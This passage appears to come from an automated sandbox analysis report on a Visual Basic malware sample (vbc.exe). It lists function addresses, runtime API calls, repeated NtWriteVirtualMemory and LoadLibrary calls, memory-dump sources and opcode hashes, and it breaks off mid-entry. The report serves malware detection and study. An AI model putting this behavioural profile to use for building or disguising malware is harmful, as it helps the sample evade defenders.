Opcode Fuzzy Hash: 080a92c9c3c2fb487e3bc96c2bebb315830741a64646396bf6efebd826edfebc
Instruction Fuzzy Hash: A6E0E531D60128AADB04DBA0ED55FED7B38BF14700F54406AF902B30E09F746945CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420B94, Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

__vbaFileClose.MSVBVM60(00000000), ref: 00420BA1
__vbaFileClose.MSVBVM60(00000000), ref: 00420BAB
__vbaExitProc.MSVBVM60 ref: 00420BB4
__vbaFreeStr.MSVBVM60(00420BF8), ref: 00420BEB
__vbaFreeStr.MSVBVM60 ref: 00420BF0
__vbaFreeStr.MSVBVM60 ref: 00420BF5

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CloseFile$ExitProc
String ID:
API String ID: 2014117853-0
Opcode ID: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
Instruction ID: 1a74a742803cabf7b99f207da3827670e0b1cecb12e14af3a137c0d733611b17
Opcode Fuzzy Hash: c3a2a4b37cd901fdd2dfd3f0805bf3e80cc1eed6359ebd58807123f09fd26edf
Instruction Fuzzy Hash: 3FE01A71D04128CACB14ABE0FD4069C7BB4AB08310B904167A402B3174DB742985CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00418C10, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00418D00: __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,72A26A76,72A26C30,?), ref: 00418D1E
Part of subcall function 00418D00: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
Part of subcall function 00418D00: __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418D85
Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
Part of subcall function 00418D00: __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
Part of subcall function 00418D00: __vbaStrMove.MSVBVM60 ref: 00418DAA
Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
Part of subcall function 00418D00: __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
Part of subcall function 00418D00: __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
Part of subcall function 00418D00: __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
Part of subcall function 00418D00: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D

Part of subcall function 004199F0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 00419A0E
Part of subcall function 004199F0: __vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 00419A3E
Part of subcall function 004199F0: __vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 00419A68

__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188), ref: 00418C86
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00418C96
__vbaI4Var.MSVBVM60(?,00000000), ref: 00418CA9
__vbaFreeObj.MSVBVM60(00000000), ref: 00418CB8
__vbaFreeVar.MSVBVM60 ref: 00418CC1

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Ansi$Error$Free$ChkstkMoveSystem$CallCheckHresultLateList
String ID:
API String ID: 873780948-0
Opcode ID: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
Instruction ID: 16d286b73a6ce5193caf80716aadf59a34bdb77ef37626ee72a0c3f1c06fc46a
Opcode Fuzzy Hash: 26f5b35a8f0ac3d08365d19e810842ecff9e3efcd4087d4e7403b082e305bca5
Instruction Fuzzy Hash: 63211DB5900209ABCB00DF95C989DEFBBBCEF58704F10451EF901B7250DA74A985CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00416000, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
__vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ErrorFreeNew2System
String ID:
API String ID: 3252491692-0
Opcode ID: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
Instruction ID: 1035c00175c6c81f3f144980975e95b43d78c84e63a20c1226013f986c834cc1
Opcode Fuzzy Hash: 599137fa2ae346e6f6b239c3f9cbb415c6691d3a238c125e19ddfd78296be001
Instruction Fuzzy Hash: 30219570A40615EBCB20CFA5EE49E9FBF78FB58740F110126F105B32E0D7B499818BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404972, Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 00428D95
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ErrorExitFreeProc
String ID:
API String ID: 4045702744-0
Opcode ID: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
Instruction ID: edda45edb35fde8433b36ffd3ef84c2269d30266a9ece54bd624009aaa599c45
Opcode Fuzzy Hash: 21644dc461e17c184ab23e9b8ca1607b74b27591d762e838d52aee4660b45f3b
Instruction Fuzzy Hash: 34215870901214EFCB00DFA5CA48E9EBBF8FF98704F64456AF405B72A0CB7859458AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420F00, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

__vbaGenerateBoundsError.MSVBVM60(00000000,-00000009,?,72A26A9B,0041FB86), ref: 00420F20
__vbaI2I4.MSVBVM60(00000000,-00000009,?,72A26A9B,0041FB86), ref: 00420F27
__vbaGenerateBoundsError.MSVBVM60(?,72A26A9B,0041FB86), ref: 00420F4D
__vbaI2I4.MSVBVM60(?,72A26A9B,0041FB86), ref: 00420F54
__vbaErrorOverflow.MSVBVM60(?,72A26A9B,0041FB86), ref: 00420F72

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$Overflow
String ID:
API String ID: 2760075901-0
Opcode ID: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
Instruction ID: 93c54f63ccc5981ea9e36820505c7139a37b1fec0ba499ff43ef88027195e6a9
Opcode Fuzzy Hash: 8669df199ba3d32dd003e43707a03247d773872a69a830caabf4d64443806dda
Instruction Fuzzy Hash: D9F0F637B4416052C364477DEA8559AB3D7AB8C783BC20177E248576738DB858C143AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042ABDE, Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

_adj_fdiv_m64.MSVBVM60(?,?), ref: 0042AC13
__vbaExitProc.MSVBVM60(?,?), ref: 0042AC21
__vbaAryDestruct.MSVBVM60(00000000,?,0042AC5E), ref: 0042AC53
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042AC5B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Destruct$ExitProc_adj_fdiv_m64
String ID:
API String ID: 3272950176-0
Opcode ID: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
Instruction ID: 432503350bff8fd263bfd7ee333f73b5f20f6540c55ce1ae75e3df8e8a0f3385
Opcode Fuzzy Hash: 0a605c6e4ccc50bbb14004817ee39ccc39d0ef59e952a399e43dad9ab60bf25d
Instruction Fuzzy Hash: 74F01730E48128EBDB209B51ED44BE8BB38BB54301F9080EAE58471094CBB95EE19F5A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2464 Parent PID: 3012 vbc.exe COMMON

Executed Functions

Function 003D0DDA, Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 597COMMON

Download Yara Rule

Strings

W.E, xrefs: 003D5CAE
ilename.exe, xrefs: 003D5DE1

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: W.E$ilename.exe
API String ID: 1029625771-2081888833
Opcode ID: d3c83efefd7bd4aa0cfd3098a07849a479582e6d3f229b6378549b5523622b40
Instruction ID: 5d8b158de2e85c2c10f13ee06b810780642d4b208764c0cfc74e923d8386506c
Opcode Fuzzy Hash: d3c83efefd7bd4aa0cfd3098a07849a479582e6d3f229b6378549b5523622b40
Instruction Fuzzy Hash: B502CB73544745ABDF376B74B9457FE2B6AAF52700F79051BEC828E782CB3498828212

Uniqueness

Uniqueness Score: -1.00%

Function 00401A5C, Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1108COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401A61

Strings

VB5!6&*, xrefs: 00401A5C

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: db62dd8124dfab7ad0fd1fa4e9f64ea740111031c2d29704ae18630c24d7bfec
Instruction ID: 3942a5c06d8afc426778690e2f8ed1d378b4247f19409e31fcd89c4be78dc6f0
Opcode Fuzzy Hash: db62dd8124dfab7ad0fd1fa4e9f64ea740111031c2d29704ae18630c24d7bfec
Instruction Fuzzy Hash: 7AF19AA240E3C18FD7079B709C656927FB1AE23314B1E46EBC481CF5E3E25C594AC766

Uniqueness

Uniqueness Score: -1.00%

Function 003D906B, Relevance: 3.6, APIs: 2, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 36f80c211bf8ae0c3494617826459bb8df08058538282eb027b35129b9907fa4
Instruction ID: e9bbd7ab2940a75f23439af89515ab1fe0493e518f50bfe69ef2befb620533ce
Opcode Fuzzy Hash: 36f80c211bf8ae0c3494617826459bb8df08058538282eb027b35129b9907fa4
Instruction Fuzzy Hash: A4227A736043059FEF239F24EC95BE977A6AF12310F64822BE9968B7D1C3748885D712

Uniqueness

Uniqueness Score: -1.00%

Function 003D3166, Relevance: 3.5, APIs: 2, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e61966a3666667663c5816e3e4832c837fc3014909ef40f44e5a37f7bdf317
Instruction ID: e389efe9222f61df85b02ec7f021ee0bae0f8f3988f4c0818016ddd47f4061b2
Opcode Fuzzy Hash: c8e61966a3666667663c5816e3e4832c837fc3014909ef40f44e5a37f7bdf317
Instruction Fuzzy Hash: B3E145B2244305AFEB236F20ED46BE9776AAF11350F604127FE469B7C1C7B89DC49602

Uniqueness

Uniqueness Score: -1.00%

Function 003D2651, Relevance: 1.9, APIs: 1, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 22983a39ad4573bd25e4a52314624492ec21d6e233bb32bf82186fde37c86c25
Instruction ID: 4fd04d1ac3f72a52362d66e616a6782e68166281980b5dc45c19f13913b27a2a
Opcode Fuzzy Hash: 22983a39ad4573bd25e4a52314624492ec21d6e233bb32bf82186fde37c86c25
Instruction Fuzzy Hash: 75D13773704606EFD7169F28EC91BE6B3A8FF14310F654227E8AA87741CB34AC549B91

Uniqueness

Uniqueness Score: -1.00%

Function 003D3911, Relevance: 1.8, APIs: 1, Instructions: 304nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: b48f941885a0c57a666c13a008d6ea1d8c9fabe1280dca2fcc3e3db85438bd26
Instruction ID: 28900f729aa9ffbde359439efb5fa5f009f1986c18fdeaee431441279acdcb8a
Opcode Fuzzy Hash: b48f941885a0c57a666c13a008d6ea1d8c9fabe1280dca2fcc3e3db85438bd26
Instruction Fuzzy Hash: E9A149B2340306AFFB225F20ED46BE9366AFF15740F644126FE45AB7C0C7B998C49646

Uniqueness

Uniqueness Score: -1.00%

Function 003D395B, Relevance: 1.8, APIs: 1, Instructions: 291nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 5315f7afcce464606157ea0c0d652d3ae1e59828b351fa4f7ecaab39b08a0627
Instruction ID: 50ec9dddd0d001615079e3a2acd9099920f107ee6fb45289b5a6794b0e83cd02
Opcode Fuzzy Hash: 5315f7afcce464606157ea0c0d652d3ae1e59828b351fa4f7ecaab39b08a0627
Instruction Fuzzy Hash: 69A146B2340306AFEB225F20ED42BE9366AFF15740F644226FE45AB7C0C7B998C49741

Uniqueness

Uniqueness Score: -1.00%

Function 003D39C3, Relevance: 1.8, APIs: 1, Instructions: 277nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: c546a2b1e274c7fb66e5953c9ace2f21d789aee2b2e54f134d07494c290260db
Instruction ID: 5392731bdb04c80380fe89f32fe16d7153c7c5357cf2d00dfd5f15314ee81c0d
Opcode Fuzzy Hash: c546a2b1e274c7fb66e5953c9ace2f21d789aee2b2e54f134d07494c290260db
Instruction Fuzzy Hash: D69148B2340306AFEB235F20ED45BE9366AEF15740F644226FE859B7C0C7B998D49742

Uniqueness

Uniqueness Score: -1.00%

Function 003D3A05, Relevance: 1.8, APIs: 1, Instructions: 270nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 200200a31312fd1ea1137c9f15d843ac8ec48aab96a5523f0ddecfa6d051a9ad
Instruction ID: dc0418ee0acdd4b95f6931a5ac73bb21d713a6e7dfdd85b6d6b620323d61e0d2
Opcode Fuzzy Hash: 200200a31312fd1ea1137c9f15d843ac8ec48aab96a5523f0ddecfa6d051a9ad
Instruction Fuzzy Hash: 229146B224030AAFEB235F20ED45BE9366AEF15340F644126FD859B7C0C7B998C49742

Uniqueness

Uniqueness Score: -1.00%

Function 003D3A38, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0912fa97cd89f35d5fc461fffc918bdfd1a043712b2de692376d3bf4cd960ec0
Instruction ID: 21cdfd713b53c123f67779c2e4279444db29f842ad847f035adccde17ad038aa
Opcode Fuzzy Hash: 0912fa97cd89f35d5fc461fffc918bdfd1a043712b2de692376d3bf4cd960ec0
Instruction Fuzzy Hash: DD9136B224030AAFEB235F20ED55BE9366AEF15340F644127FD459B7C0C3B999C99742

Uniqueness

Uniqueness Score: -1.00%

Function 003D3A51, Relevance: 1.8, APIs: 1, Instructions: 266nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 8954a504cf21061b8c317f6bbbd7c5da4939d5c722f78a72941577b2cf590f5c
Instruction ID: 7837750a325c329f00e4d6c7a88484cf45371799a4114c7a84bb728cad7b1f15
Opcode Fuzzy Hash: 8954a504cf21061b8c317f6bbbd7c5da4939d5c722f78a72941577b2cf590f5c
Instruction Fuzzy Hash: B391567224020AAFEF235F20ED86BE9366AEF15340F644127FD499B3C0C3B998C89741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3A9B, Relevance: 1.8, APIs: 1, Instructions: 250nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: d4a82009ec93dde8a51652fcad87087b5ca43ee1b51325a447c7d3fca8cc9ef5
Instruction ID: 727aabf613705cb84080617c198300d85ccd76fbe2e5e12cc042bfec48678410
Opcode Fuzzy Hash: d4a82009ec93dde8a51652fcad87087b5ca43ee1b51325a447c7d3fca8cc9ef5
Instruction Fuzzy Hash: 768147B224030AAFEB235F20ED857E9766AFF15340F644226FD45AB7C0C3B998D99741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3AE7, Relevance: 1.7, APIs: 1, Instructions: 243nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ea2fbcfea29e0a7bf357546d042aaedb5cad92d5ba386b0eb7d869c15c71143f
Instruction ID: 2f2ce6c4da44c6d46853fcc7f8aa81ee8ddb97b6bb67e184c94aa5f35c4b8b83
Opcode Fuzzy Hash: ea2fbcfea29e0a7bf357546d042aaedb5cad92d5ba386b0eb7d869c15c71143f
Instruction Fuzzy Hash: 668136B224030AAFEF225F20ED85BE9766AFF15340F644226FD459B7C0C7B998D89741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3B57, Relevance: 1.7, APIs: 1, Instructions: 223nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: e7c573e9e36d2d2a625ecca75c32b3c7e4560f46d64dc25bf7354963c2eaf553
Instruction ID: befb5132207a974a8cf7ced03a662e21b8cd17bc4c297960bd5c17d45c1b9239
Opcode Fuzzy Hash: e7c573e9e36d2d2a625ecca75c32b3c7e4560f46d64dc25bf7354963c2eaf553
Instruction Fuzzy Hash: AE7127B224030AAFEB225F10ED85BE97666FF15340F604126FD459B7C1C3B998D49741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3B88, Relevance: 1.7, APIs: 1, Instructions: 222nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0449efc45cc6348997d37e63a9ba36f09f0fcf59e3d03cc63f9cbef98be3349a
Instruction ID: 0a319d712f53916631bf44a7be1e6d046c82f4f6dcbe2fd21870b3eef4364108
Opcode Fuzzy Hash: 0449efc45cc6348997d37e63a9ba36f09f0fcf59e3d03cc63f9cbef98be3349a
Instruction Fuzzy Hash: 9D7147B224030AAFEB225F10ED457E9766AFF15340F644226FE459B7C0C7B998D49B41

Uniqueness

Uniqueness Score: -1.00%

Function 003D3BE9, Relevance: 1.7, APIs: 1, Instructions: 210nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 451287e25643ea49ecc2e5f23b3ecc9ab37907dd0d253f533c1f55c8d23d609b
Instruction ID: ce5b46b1b2942f15b6f569e39bad59270bfc5e882aa8c795a29664d1db058c77
Opcode Fuzzy Hash: 451287e25643ea49ecc2e5f23b3ecc9ab37907dd0d253f533c1f55c8d23d609b
Instruction Fuzzy Hash: 61612772240309AFFF225F10ED45BE9766AFF15340F644226FE459B6C0C7B998D89B41

Uniqueness

Uniqueness Score: -1.00%

Function 003D3C94, Relevance: 1.7, APIs: 1, Instructions: 192nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 6fdc891d520f407418e08a48db30dab66ac27ebfca504e391ffde8e92279d270
Instruction ID: 894d0cd6f268b46d9eefd9ba15d9270218e84909d998caaf4adb99c5ed67b31c
Opcode Fuzzy Hash: 6fdc891d520f407418e08a48db30dab66ac27ebfca504e391ffde8e92279d270
Instruction Fuzzy Hash: 76514772380309AFFF335F10EC81BE9366AEB16740F640126FE859A2C0C7B99CC59645

Uniqueness

Uniqueness Score: -1.00%

Function 003D3C4F, Relevance: 1.7, APIs: 1, Instructions: 191nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b91c6af5913589dc401935b9d044abc1580b033fda759295e798a0eff96e6ae9
Instruction ID: 54e9dfbb4463d8b0219836877788fd47cb1fb1db5d23723393152e268e91d5b9
Opcode Fuzzy Hash: b91c6af5913589dc401935b9d044abc1580b033fda759295e798a0eff96e6ae9
Instruction Fuzzy Hash: 4451F172240209AFFB235F10EC95BE9766AFB15300F644126FE499B6C1C3B99CD89B41

Uniqueness

Uniqueness Score: -1.00%

Function 003D3CD3, Relevance: 1.7, APIs: 1, Instructions: 182nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 46856896c9461fa042b893340542e3d8b9772503bef2a8be5f0c1eb0827a4c72
Instruction ID: 1cc2301d68a5a57003f458e40b62746d93ce9c8848f9c85b49d8e6821eff1db1
Opcode Fuzzy Hash: 46856896c9461fa042b893340542e3d8b9772503bef2a8be5f0c1eb0827a4c72
Instruction Fuzzy Hash: 9F512672280209AFEF335F10ED81BE9366AEB16740F644126FE85DA2C0C7B99CC59645

Uniqueness

Uniqueness Score: -1.00%

Function 003D3D4D, Relevance: 1.7, APIs: 1, Instructions: 162nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 003D4061

Memory Dump Source

